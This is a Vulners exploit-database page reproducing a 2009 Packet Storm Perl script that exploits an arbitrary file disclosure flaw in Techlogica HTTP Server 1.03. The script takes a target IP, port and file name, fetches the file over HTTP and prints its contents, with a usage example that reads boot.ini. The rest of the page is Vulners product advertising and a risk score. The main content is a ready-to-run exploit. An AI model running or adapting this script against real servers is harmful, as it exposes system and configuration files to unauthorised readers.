Lucene search
K

Techlogica HTTP Server 1.03 File Disclosure

🗓️ 15 Sep 2009 00:00:00Reported by ThE g0bL!NType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Techlogica HTTP Server 1.03 File Disclosure Exploit

Code
`#!/usr/bin/perl -w  
#By ThE g0bL!N  
#Download : http://www.softpedia.com/get/Internet/Servers/WEB-Servers/Techlogica-HTTP-Server.shtml  
#Happy Ramadan And Happy eid  
use LWP::Simple;  
use LWP::UserAgent;  
print "\tTechlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit\n";  
if(@ARGV < 3)  
{  
&help; exit();  
}  
sub help()  
{  
print "[X] Usage : perl $0 IP Port File\n";  
print "[X] Example : perl $0 127.0.0.1 80 boot.ini\n";  
}  
($TargetIP, $AttackedPort, $TargetFile) = @ARGV;  
print("Please Wait ! Connecting To The Server ......\n\n");  
sleep(5);  
print(" ******************************\n");  
print(" * Status *\n");  
print(" ******************************\n");  
print("Loading ........................................\n\n\n");  
$temp="/";  
my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;  
print("Exploiting .....> |80\n");  
$Disclosure=get $boom;  
if($Disclosure){  
print("\n\n\n\n............File Contents Are Just Below...........\n");  
print("$Disclosure \n");  
}  
else  
{  
print(" Not Found !!!\n\n");  
exit;  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4
22